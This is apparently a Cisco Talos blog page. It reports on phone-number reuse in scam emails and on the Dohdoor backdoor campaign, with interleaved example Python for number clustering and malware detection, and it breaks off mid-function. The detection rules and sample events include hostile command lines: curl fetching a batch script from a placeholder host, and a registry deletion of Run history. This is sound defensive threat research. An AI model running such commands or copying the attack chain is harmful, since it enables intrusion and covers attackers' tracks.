  • Cisco Talos Blog
  • Insights into the clustering and reuse of phone numbers in scam emails, by Omid Mirzaei

Insights into the clustering and reuse of phone numbers in scam emails

6 May 2026, 07:00
  • Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.  
  • According to Talos’ observations, the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective scam operations that are difficult to trace. 
  • Attackers maintain operational continuity by rotating through sequential blocks of phone numbers and utilizing strategic cool-down periods, with a median phone number lifespan of 14 days, to effectively evade reputation-based security filters. 
  • Threat actors try to maximize their reach by recycling the same phone numbers across diverse, seemingly unrelated lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously. 
  • Security researchers can expose the hidden infrastructure of organized scam call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.


Telephone-oriented attack delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into disclosing sensitive information or installing malicious software. 

Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.

To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden the scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights, Talos aims to strengthen our collective defensive posture against these evolving threats.

The structure of VoIP phone numbers 

Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN). 

An E.164 number is limited to 15 digits and consists of: 

  1. International Prefix (+): Indicates the number is in international format 
  2. Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK) 
  3. Area Code/National Destination Code (NDC): Often referred to as the area code 
  4. Subscriber Number (SN): The specific number assigned to the user or device 

The above components are shown in the example phone number below:

Figure 1. The structure of an example VoIP phone number.
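As an added example (not code from the Talos post), the normalizer below turns phone numbers as they appear in email text, including the bracket-defanged form used later in this post, into the E.164 components listed above. The country-code table is a deliberately partial stand-in for the full ITU plan, the area-code (NDC) split is only applied to +1 numbers because NANP area codes have a fixed length, and numbers without a leading "+" are assumed to belong to a default country code; all three are assumptions of the example, not statements from the post.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed, partial country-code table. E.164 assigns 1- to 3-digit codes;
# only a handful are listed here so the example stays short.
COUNTRY_CODES = {"1", "44", "49", "33", "91", "234", "353"}

# Formatting and "defanging" residue commonly seen around numbers in emails:
# spaces, parentheses, dots, hyphens and the [-] / [.] brackets analysts use.
_NOISE = re.compile(r"\[-\]|\[\.\]|[\s().\-]")


@dataclass(frozen=True)
class E164Number:
    raw: str
    digits: str            # full E.164 digit string without the leading '+'
    country_code: str
    ndc: Optional[str]     # area code / national destination code, when derivable
    subscriber: str

    @property
    def e164(self) -> str:
        return "+" + self.digits


def normalize(raw: str, default_cc: str = "1") -> Optional[E164Number]:
    """Normalize a phone number found in email text to E.164 components.

    Returns None when the string cannot be an E.164 number: non-digit residue,
    more than 15 digits, or an unknown country code. Numbers without a leading
    '+' are treated as national numbers in `default_cc` (an assumption made by
    this example, not something the post specifies).
    """
    s = _NOISE.sub("", raw.strip())
    if s.startswith("+"):
        digits = s[1:]
    elif s.startswith("00"):             # common international dialing prefix
        digits = s[2:]
    else:
        digits = default_cc + s
    if not digits.isdigit() or not 7 <= len(digits) <= 15:
        return None
    # Country codes are 1-3 digits; try the shortest match first.
    cc = next((digits[:n] for n in (1, 2, 3) if digits[:n] in COUNTRY_CODES), None)
    if cc is None:
        return None
    national = digits[len(cc):]
    if cc == "1":
        # NANP: 3-digit area code (NDC) + 7-digit subscriber number.
        if len(national) != 10:
            return None
        return E164Number(raw, digits, cc, national[:3], national[3:])
    # Other plans have variable-length NDCs, so only the subscriber part is returned.
    return E164Number(raw, digits, cc, None, national)


if __name__ == "__main__":
    for sample in ("+1 804[-]713[-]4598", "(804) 713-4598", "+44 20 7946 0958", "+1 804 713"):
        print(repr(sample), "->", normalize(sample))
```

Normalizing every number to the same `e164` string before storing it is what makes the reuse and clustering analysis later in the post possible: the same line appears with spaces, parentheses, dots or defanging brackets in different lures, and only the digit string is stable.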

The VoIP ecosystem 

Voice over Internet Protocol (VoIP) has become the primary medium for scam campaigns due to its cost effectiveness, ease of deployment, and API-driven automation. Within this ecosystem, we identify two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth) operate in a business-to-business (B2B) capacity, sitting between Tier 1 carriers (e.g., AT&T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end users. 

VoIP providers are further categorized into communications platform as a service (CPaaS) and unified communications as a service (UCaaS). CPaaS providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are frequently exploited by threat actors for rapid, API-driven number provisioning. In contrast, UCaaS providers offer comprehensive, end-user-facing communication suites. UCaaS platforms are typically designed for legitimate enterprise collaboration, which makes them less attractive for scam email campaigns. In the studied time window, Talos found Sinch (primarily a leader in CPaaS) to be the most commonly abused VoIP provider, and Verizon and NUSO the least abused.

Figure 2. The distribution of phone line types in scam emails.

While VoIP line types dominate the scam landscape (see Figure 2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers. Nevertheless, they are still widely adopted by scammers. Figure 3 shows the distribution of wireless carriers used by scammers in the studied time window. Landline numbers, on the other hand, are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).

Figure 3. The distribution of carrier names in wireless phone numbers found in scam emails.

Phone number reuse and lifespan in scam campaigns 

In this section, we provide insights into the lifecycle of phone numbers used in scam emails, examining how often they are reused, their typical lifespan, and how they appear across seemingly unrelated lures. Our analysis focuses on scam campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock. 

Phone number reuse patterns 

Talos identified 1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57 numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse observed for a single phone number was four consecutive days. 

As discussed in a previous blog post, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.

Lifespan analysis and cool-down periods 

Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period — pausing the use of a number for a few days to evade detection — before reintroducing it into a campaign. 

Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.

Figure 4. The distribution of phone number lifespans (in days) in scam emails impersonating the above four brands.
Figure 5. The lifespan of phone numbers in scam emails for the top two impersonated brands.

Phone numbers across unrelated lures 

A scam or phishing lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for a few examples). These lures appear across various email layers, including subject lines, body content, and attachments.

Claimed business context
  • Subscription renewal
  • Invoice or billing statement
  • Account security alert
  • Order confirmation/shipping issue
  • Technical support case
  • Refund or overpayment notice
  • Service cancelation confirmation
  • Financial transaction verification

Psychological trigger
  • Urgency
  • Fear/Loss aversion
  • Confusion
  • Relief opportunity
  • Curiosity

Call-to-action
  • Call a phone number
  • Click a link
  • Reply with personal details
  • Download/open attachment
  • Provide payment/banking information

Impersonated brand
  • PayPal
  • Geek Squad (Best Buy)
  • McAfee
  • Norton LifeLock

Table 1. Examples of lures that most commonly appear in scam or phishing emails.

We observed phone numbers being recycled across diverse, seemingly unrelated lures: 

  • Using the same phone number across multiple lures in the subject line: In one campaign, a single phone number appeared across multiple business contexts, such as "order confirmation" and "financial transaction verification." Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.

Figure 6. Four scam emails with completely different subject lines that contain the same phone number.

  • Using the same phone number across multiple document-based lures: In a second campaign, a single phone number was embedded in PDF attachments used for both “subscription renewal” and “financial transaction verification.” Interestingly, this campaign utilized two different brands — PayPal and Norton LifeLock — to redirect recipients to the same call center, leveraging urgency as a psychological trigger.

Figure 7. Two scam emails with different body contents that contain the same phone number while impersonating different brands.

  • Using the same phone number across multiple attachment file formats: In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) — a format often used for iPhone/iPad photos — demonstrates the attackers' efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.

Figure 8. Two scam emails with different attachment file types that contain the same phone number while impersonating the same brand.
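The reuse, lifespan and cross-lure observations in the preceding sections can be reproduced on any per-email table of (date, number, brand, layer, context). The script below is an added example, not Talos tooling, and runs on a small constructed sample using reserved 555-01xx fictitious numbers; its definitions of lifespan (inclusive first-to-last sighting), consecutive-day reuse and cool-down gap are choices made here, since the post does not spell them out.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import date, timedelta
from statistics import median

# Constructed sample telemetry, one tuple per scam email:
# (date seen, E.164 phone number, impersonated brand, email layer, claimed business context).
# The rows are invented for this example and are not Talos data.
SAMPLE_EMAILS = [
    ("2026-03-03", "+18045550101", "PayPal", "subject", "order confirmation"),
    ("2026-03-03", "+18045550101", "PayPal", "subject", "financial transaction verification"),
    ("2026-03-04", "+18045550101", "PayPal", "body", "invoice or billing statement"),
    ("2026-03-05", "+18045550101", "PayPal", "subject", "order confirmation"),
    ("2026-03-09", "+18045550101", "PayPal", "pdf", "subscription renewal"),
    ("2026-03-09", "+18045550101", "Norton LifeLock", "pdf", "financial transaction verification"),
    ("2026-03-10", "+18045550123", "McAfee", "subject", "subscription renewal"),
    ("2026-03-12", "+18045550100", "Geek Squad (Best Buy)", "heic", "subscription renewal"),
    ("2026-03-13", "+18045550100", "Geek Squad (Best Buy)", "jpeg", "subscription renewal"),
]


@dataclass
class NumberProfile:
    number: str
    active_days: list = field(default_factory=list)   # sorted distinct dates the number was seen
    brands: set = field(default_factory=set)
    contexts: set = field(default_factory=set)
    layers: set = field(default_factory=set)
    email_count: int = 0

    @property
    def lifespan_days(self) -> int:
        # Lifespan as defined for this example: inclusive span from first to last sighting.
        return (self.active_days[-1] - self.active_days[0]).days + 1

    @property
    def longest_consecutive_run(self) -> int:
        # Longest streak of back-to-back days on which the number was used.
        best = run = 1
        for prev, cur in zip(self.active_days, self.active_days[1:]):
            run = run + 1 if cur - prev == timedelta(days=1) else 1
            best = max(best, run)
        return best

    @property
    def cooldown_gaps(self) -> list:
        # Idle days between sightings; a non-empty list means the number was parked and reintroduced.
        return [(cur - prev).days - 1
                for prev, cur in zip(self.active_days, self.active_days[1:])
                if (cur - prev).days > 1]


def build_profiles(rows):
    """Pivot per-email rows into one profile per phone number."""
    days = defaultdict(set)
    profiles = {}
    for day, number, brand, layer, context in rows:
        p = profiles.setdefault(number, NumberProfile(number))
        days[number].add(date.fromisoformat(day))
        p.brands.add(brand)
        p.contexts.add(context)
        p.layers.add(layer)
        p.email_count += 1
    for number, p in profiles.items():
        p.active_days = sorted(days[number])
    return profiles


def summarize(profiles):
    """Campaign-level figures of the kind the post quotes: counts, median lifespan, cross-lure reuse."""
    multi_day = [p for p in profiles.values() if len(p.active_days) > 1]
    return {
        "unique_numbers": len(profiles),
        "reused_consecutive_days": sum(1 for p in profiles.values() if p.longest_consecutive_run >= 2),
        "active_more_than_one_day": len(multi_day),
        "median_lifespan_days": median([p.lifespan_days for p in multi_day]) if multi_day else 0,
        "cross_brand_numbers": sorted(p.number for p in profiles.values() if len(p.brands) > 1),
        "cross_lure_numbers": sorted(p.number for p in profiles.values()
                                     if len(p.contexts) > 1 or len(p.layers) > 1),
    }


if __name__ == "__main__":
    profiles = build_profiles(SAMPLE_EMAILS)
    for p in profiles.values():
        print(p.number, "lifespan", p.lifespan_days, "run", p.longest_consecutive_run,
              "cool-downs", p.cooldown_gaps, "brands", sorted(p.brands))
    print(summarize(profiles))
```

Keeping "reused on consecutive days" and "active for more than one day" as separate counters mirrors the distinction the post draws: a number that is parked for a cool-down and then reintroduced shows up in the second figure but not the first, and the `cooldown_gaps` list is what exposes that pattern.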

Phone block-level clustering 

In the context of scam emails and related smishing or callback scams, attackers utilize specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and maintain high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by purchasing Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block. 

The figure below shows how a block of numbers — differing only in the last four digits — is used in various scam emails impersonating PayPal between March 3 and March 6, 2026. It is also clear that certain numbers are used in larger campaigns than others; for instance, “+1 804[-]713[-]4598” was used in 117 scam emails in a single day.

Figure 9. Example of sequential phone numbers used in scam emails impersonating one specific brand.

In large-scale scam campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the previous case, some phone numbers are utilized in significantly larger campaign volumes than others.

Figure 10. Example of sequential phone numbers used in scam emails impersonating multiple brands.
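To surface the sequential blocks described above, group numbers by their NPA-NXX prefix (everything but the last four digits of a +1 number) and look for runs of adjacent line numbers, then attach the per-number email volume and brand set so the busiest member of each block stands out. The code below is an added example (not Talos tooling) on constructed rows using reserved 555-01xx numbers; the `max_gap` tolerance and the restriction to +1 numbers are assumptions of the example.

```python
from collections import Counter, defaultdict

# Constructed sample: (E.164 number, impersonated brand, number of scam emails seen).
# These rows are invented for this example and are not Talos data.
SAMPLE_ROWS = [
    ("+18045550100", "PayPal", 3),
    ("+18045550101", "PayPal", 5),
    ("+18045550102", "Norton LifeLock", 2),
    ("+18045550103", "McAfee", 1),
    ("+18045550150", "PayPal", 1),                  # same NPA-NXX, but far from the run
    ("+18005550199", "Geek Squad (Best Buy)", 2),   # different prefix, isolated
]


def nanp_block_key(e164):
    """Split a +1 (NANP) number into its NPA-NXX prefix and 4-digit line number.

    Returns None for anything that is not an 11-digit +1 number; other numbering
    plans have variable-length area codes and would need their own split.
    """
    digits = e164.lstrip("+")
    if len(digits) != 11 or not digits.startswith("1") or not digits.isdigit():
        return None
    return "+1" + digits[1:7], int(digits[7:])


def find_sequential_blocks(rows, max_gap=1, min_size=2):
    """Group numbers that share an NPA-NXX prefix and run consecutively.

    `max_gap` is the largest difference between neighbouring line numbers still
    treated as one block (1 = strictly sequential); the threshold is a choice
    made for this example, not something the post specifies.
    """
    volume = Counter()
    brands = defaultdict(set)
    for number, brand, count in rows:
        volume[number] += count
        brands[number].add(brand)

    by_prefix = defaultdict(list)
    for number in volume:
        key = nanp_block_key(number)
        if key:
            by_prefix[key[0]].append((key[1], number))

    def make_block(prefix, run):
        numbers = [n for _, n in run]
        return {
            "prefix": prefix,
            "numbers": numbers,
            "brands": sorted(set().union(*(brands[n] for n in numbers))),
            "volume": {n: volume[n] for n in numbers},
            "busiest": max(((n, volume[n]) for n in numbers), key=lambda kv: kv[1]),
        }

    blocks = []
    for prefix, items in by_prefix.items():
        items.sort()                       # by line number within the prefix
        run = [items[0]]
        for prev, cur in zip(items, items[1:]):
            if cur[0] - prev[0] <= max_gap:
                run.append(cur)
            else:
                if len(run) >= min_size:
                    blocks.append(make_block(prefix, run))
                run = [cur]
        if len(run) >= min_size:
            blocks.append(make_block(prefix, run))
    return blocks


if __name__ == "__main__":
    for block in find_sequential_blocks(SAMPLE_ROWS):
        print(block["prefix"], block["numbers"], block["brands"], "busiest:", block["busiest"])
```

Because a block is reported with every brand its members impersonated, the output directly shows the pattern in Figure 10: one purchased DID range serving several lures. Raising `max_gap` tolerates holes in a range where some numbers were never observed.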

Conclusion and protection 

When tracking scam campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering scam lures based on shared phone numbers, security researchers can effectively map connections between seemingly unrelated campaigns, ultimately exposing the infrastructure of organized criminal call centers. 

Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example, establishing centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence regarding malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud. 

Cisco Secure Email Threat Defense 

Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.

Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack. You can sign up for a free trial of Email Threat Defense today. 

  • Cybersecurity News
  • Beyond Stuxnet: Uncovering fast16, the Apex Saboteur That Rewrites Mathematical Reality, by Ddos (Daily CyberSecurity)

They Built a Legendary Privacy Tool. Now They’re Sworn Enemies

21 April 2026, 07:00
There’s a lot of love all over the world for GrapheneOS, the gold standard of mobile security. There’s very little love between the two guys at the center of its history.

The Shocking Secrets of Madison Square Garden’s Surveillance Machine

17 April 2026, 07:00
Famously vengeful Knicks owner Jim Dolan has long spied on people at his iconic arenas. WIRED goes deep inside the operation that allegedly tracked a trans woman, lawyers, protesters, and more.

  • Cybersecurity News
  • No More Starting Over: How to Move Your ChatGPT and Claude “Memories” to Google Gemini, by Ddos (Daily CyberSecurity)

Anduril Wants to Own the Future of War Tech. Mishaps, Delays, and Challenges Abound

26 March 2026, 07:00
From drones to missiles to submarines, the $30.5 billion defense startup wants to transform how the tools of war are made. It’s not all going as planned.

When Satellite Data Becomes a Weapon

25 March 2026, 10:00
As war reshapes the Gulf, the satellite infrastructure the world relies on to see conflict clearly is being delayed, spoofed, and privately controlled—and nobody is sure who is responsible.

Hassan Took a Bike Ride. Now He’s One of the Thousands Missing in Gaza

23 March 2026, 07:00
In a place denied access to basic forensic technology—and where people disappear into Israeli detention—the fate of thousands remains unknown. One of them is an autistic teenager.

What Happens When You Can’t Get a Death Certificate in Gaza

23 March 2026, 07:00
For families of the missing, systemic obstacles to identifying remains and locating people in Israeli detention have created a kind of social and legal purgatory.

  • Cisco Talos Blog
  • New Dohdoor malware campaign targets education and health care, by Alex Karkins

New Dohdoor malware campaign targets education and health care

26 February 2026, 08:00
  • Cisco Talos discovered an ongoing malicious campaign since at least as early as December 2025 by a threat actor we track as “UAT-10027,” delivering a previously undisclosed backdoor dubbed “Dohdoor.” 
  • Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively. 
  • UAT-10027 targeted victims in the education and health care sectors in the United States through a multi-stage attack chain. 
  • Talos observed that the actor misused various living-off-the-land executables (LOLBins) to sideload Dohdoor and set up the C2 infrastructure behind reputable cloud services, such as Cloudflare, to enable stealthy C2 communication.

Multi-stage attack chain  


Talos discovered a multi-stage attack campaign targeting victims in the education and health care sectors, predominantly in the United States.

The campaign involves a multi-stage attack chain, where initial access is likely achieved through social engineering phishing techniques. The infection chain executes a PowerShell script that downloads and runs a Windows batch script from a remote staging server through a URL. Subsequently, the batch script downloads a malicious Windows dynamic-link library (DLL) disguised as a legitimate Windows DLL file. The batch script then executes the malicious DLL, dubbed Dohdoor, by sideloading it into a legitimate Windows executable. Once activated, Dohdoor employs the DNS-over-HTTPS (DoH) technique to resolve command-and-control (C2) domains through Cloudflare’s DNS service. Using the resolved IP address, it establishes an HTTPS tunnel to the Cloudflare edge network, which effectively serves as a front for the concealed C2 infrastructure. Dohdoor subsequently creates backdoor access into the victim's environment, enabling the threat actor to download the next-stage payload directly into the victim machine's memory and reflectively execute the likely Cobalt Strike Beacon payload within legitimate Windows processes.

In this campaign, the threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address. This obfuscation is further reinforced by subdomain names such as “MswInSofTUpDloAd” and “DEEPinSPeCTioNsyStEM”, which mimic Microsoft Windows software updates or a security appliance check-in to evade automated detections. Additionally, the irregular capitalization across non-traditional top-level domains (TLDs) like “.OnLiNe”, “.DeSigN”, and “.SoFTWARe” not only bypasses string matching filters but also adds redundancy to the adversarial infrastructure by preventing a single blocklist entry from neutralizing the intrusion.


PowerShell downloader

Talos discovered suspicious download activity in our telemetry where the threat actor executed “curl.exe” with an encoded URL, downloading a malicious Windows batch file with the file extension “.bat” or “.cmd”.

Figure 2. Snippet of the PowerShell downloader command. 

While the initial infection vector remains unknown, we observed several PowerShell scripts in OSINT data containing embedded download URLs similar to those identified in the telemetry. The threat actor appeared to have executed the download command via a PowerShell script that was potentially delivered to the victim through a phishing email. 

Figure 3. Sample of related PowerShell script.
Figure 4. Sample of related PowerShell script.

Windows batch script and anti-forensics  

The second-stage component of the attack chain is a Windows batch script dropper that orchestrates a DLL sideloading technique to execute the malicious DLL while simultaneously conducting anti-forensic cleanup.

This process starts by creating a hidden workspace folder in either “C:\ProgramData” or “C:\Users\Public”. It then downloads a malicious DLL from the command-and-control server using the URL /111111?sub=d, placing it into the workspace under a legitimate Windows DLL file name, such as “propsys.dll” or “batmeter.dll”. The script subsequently copies legitimate Windows executables, such as “Fondue.exe”, “mblctr.exe”, and “ScreenClippingHost.exe”, into the working folder and executes them from there, passing the C2 URL /111111?sub=s as the argument. The legitimate executable sideloads and runs the malicious DLL. Finally, the script performs anti-forensics by deleting the Run command history from the RunMRU registry key, clearing the clipboard data, and ultimately deleting itself.

Figure 5. Deobfuscated Windows batch loader script (C2 URLs defanged). 
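Every step of the batch script above leaves a process-creation artifact a defender can match on: a System32 binary running from a hidden folder under ProgramData or Users\Public, that binary receiving a URL as its argument, the /111111?sub= resource path, a curl.exe download whose target is a batch file, and the RunMRU deletion. The rules below are an added example (not Talos detection content) run over constructed Sysmon-style events; the reg.exe form of the RunMRU deletion, the curl.exe output-file heuristic and the sample paths and URLs are assumptions of the example, while the executable names, staging folders and resource paths come from the report.

```python
import re

# Windows binaries the report says were copied out of System32 and used as sideload hosts.
SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}
# Hidden workspace roots named in the report.
STAGING_DIRS = (r"c:\programdata", r"c:\users\public")
# Resource paths quoted in the report: /111111?sub=d (DLL), /111111?sub=s and /X111111?sub=s (payload).
C2_PATH = re.compile(r"/x?111111\?sub=[ds]", re.I)
URL = re.compile(r"https?://\S+", re.I)
# Well-known Run dialog history key; the reg.exe form of the deletion is this example's assumption.
RUNMRU = r"software\microsoft\windows\currentversion\explorer\runmru"

# Constructed process-creation events (Sysmon-style fields); not telemetry from the report.
# Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\ProgramData\.cache\mblctr.exe",
     "command_line": r'"C:\ProgramData\.cache\mblctr.exe" https://c2.example.invalid/111111?sub=s'},
    {"id": "e2", "image": r"C:\Windows\System32\mblctr.exe",
     "command_line": "mblctr.exe"},
    {"id": "e3", "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -s https://stage.example.invalid/p -o C:\Users\Public\Libraries\x.cmd"},
    {"id": "e4", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f"},
    {"id": "e5", "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe https://www.example.invalid/index.html -o C:\Temp\index.html"},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_staging_dir(path):
    p = path.lower()
    return any(p.startswith(d + "\\") for d in STAGING_DIRS)


def evaluate(event):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    img = image_name(event["image"])
    cmd = event["command_line"]
    if img in SIDELOAD_HOSTS and in_staging_dir(event["image"]):
        hits.append("lolbin_copied_to_staging_dir")
        if URL.search(cmd):
            hits.append("lolbin_launched_with_url_argument")
    if C2_PATH.search(cmd):
        hits.append("dohdoor_c2_uri_pattern")
    if img == "curl.exe" and re.search(r"\.(bat|cmd)\b", cmd, re.I):
        hits.append("curl_fetches_batch_script")
    if img == "reg.exe" and "delete" in cmd.lower() and RUNMRU in cmd.lower():
        hits.append("runmru_history_cleared")
    return hits


def scan(events):
    """Map event id -> fired rules, for events that fired anything."""
    results = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            results[event["id"]] = hits
    return results


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

The path check is the durable part of this logic: the same mblctr.exe running from System32 (event e2) fires nothing, while the copy under ProgramData fires even if the actor changes the URL, because a signed Windows binary has no business executing from a hidden staging folder.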

Dohdoor potentially runs the payload reflectively  

UAT-10027 downloaded and executed a malicious DLL using the DLL sideloading technique. The malicious DLL operates as a loader, which we call “Dohdoor,” and it is designed to download, decrypt, and execute malicious payloads within legitimate Windows processes. It evades detection through API obfuscation and encrypted C2 communications, and bypasses endpoint detection and response (EDR) detections.  

Dohdoor is a 64-bit DLL compiled on Nov. 25, 2025, containing the debug string "C:\Users\diablo\Desktop\SimpleDll\TlsClient.hpp". Dohdoor begins execution by dynamically resolving Windows API functions using hash-based lookups rather than static imports, preventing signature-based detections from identifying the malware through its Import Address Table (IAT). Dohdoor then parses the command line arguments that the actor passed when executing the legitimate Windows executable that sideloads it. It extracts an HTTPS URL pointing to the C2 server and a resource path specifying the type of payload to download.

Figure 6. Snippet of Dohdoor function, showing API hash resolving and command line argument parsing.

Dohdoor employs stealthy domain resolution utilizing the DNS-over-HTTPS technique to effectively resolve the C2 server IP address. Rather than generating plaintext DNS queries, it securely sends encrypted DNS requests to Cloudflare’s DNS server over HTTPS port 443. It constructs DNS queries for both IPv4 (A records) and IPv6 (AAAA records) and formats them using the template strings that include the HTTP header parameters such as User-Agent: insomnia/11.3.0 and Accept: applications/dns-json, producing a complete HTTP GET request. 

The formatted HTTP request is sent over the encrypted connection. After receiving the JSON response from Cloudflare’s DNS servers, Dohdoor parses it by searching for specific patterns rather than using a full JSON parser. It searches for the string “Answer” to locate the answer section of the response and, if found, searches for the string “data” to locate the field containing the IP address.

This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, keeping the malware's C2 communications hidden from traditional network security infrastructure.

Figure 7. Snippet of Dohdoor showing the DoH technique.

With the resolved IP address, Dohdoor establishes a secure connection to the C2 server by constructing the GET requests with the HTTP headers including “User-agent: curl/7.88” or “curl/7.83.1” and the URL /X111111?sub=s. It supports both standard HTTP responses with Content-length headers and chunked encoding. 
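On the network side, the DoH lookups and the payload fetch described above can be matched in proxy logs. The scanner below is an added example (not Talos detection content); the whitespace-separated log format, the resolver hostname and the sample IPs and second-level domains are constructed for the example, while the User-Agent strings, the Accept value (reproduced with the spelling quoted above), the mixed-case labels, the TLDs and the resource paths come from the report. Indicators are returned individually so weak ones (any JSON DoH lookup, a common curl User-Agent) can be weighted below strong ones (the /X111111?sub=s path).

```python
import re
from urllib.parse import parse_qs, urlsplit

CAMPAIGN_TLDS = {"online", "design", "software"}        # TLDs quoted in the report
DOHDOOR_UAS = {"curl/7.88", "curl/7.83.1"}             # User-Agent values quoted in the report
C2_PATH = re.compile(r"^/x?111111\?sub=[ds]$", re.I)    # /111111?sub=d, /111111?sub=s, /X111111?sub=s

# Constructed proxy log, one request per line:
#   timestamp client method host path status user_agent accept
# Client IPs, the 203.0.113.x address, the "example" second-level labels and the
# resolver hostname are placeholders invented for this example; the subdomain labels,
# TLD spellings, User-Agent and Accept values are the report's.
SAMPLE_LOG = """\
2026-02-10T12:00:01Z 10.0.0.5 GET cloudflare-dns.com /dns-query?name=MswInSofTUpDloAd.example.OnLiNe&type=A 200 insomnia/11.3.0 applications/dns-json
2026-02-10T12:00:02Z 10.0.0.7 GET cloudflare-dns.com /dns-query?name=example.com&type=A 200 Mozilla/5.0 application/dns-json
2026-02-10T12:00:03Z 10.0.0.5 GET 203.0.113.10 /X111111?sub=s 200 curl/7.88 */*
2026-02-10T12:00:04Z 10.0.0.9 GET www.example.com / 200 Mozilla/5.0 text/html
2026-02-10T12:00:05Z 10.0.0.5 GET DEEPinSPeCTioNsyStEM.example.SoFTWARe /111111?sub=d 200 curl/7.83.1 */*
"""


def parse_line(line):
    ts, client, method, host, path, status, ua, accept = line.split(None, 7)
    return {"ts": ts, "client": client, "method": method, "host": host,
            "path": path, "status": int(status), "user_agent": ua, "accept": accept}


def looked_up_name(rec):
    """The hostname the request is really about: the DoH `name=` parameter when present, else Host."""
    qs = parse_qs(urlsplit(rec["path"]).query)
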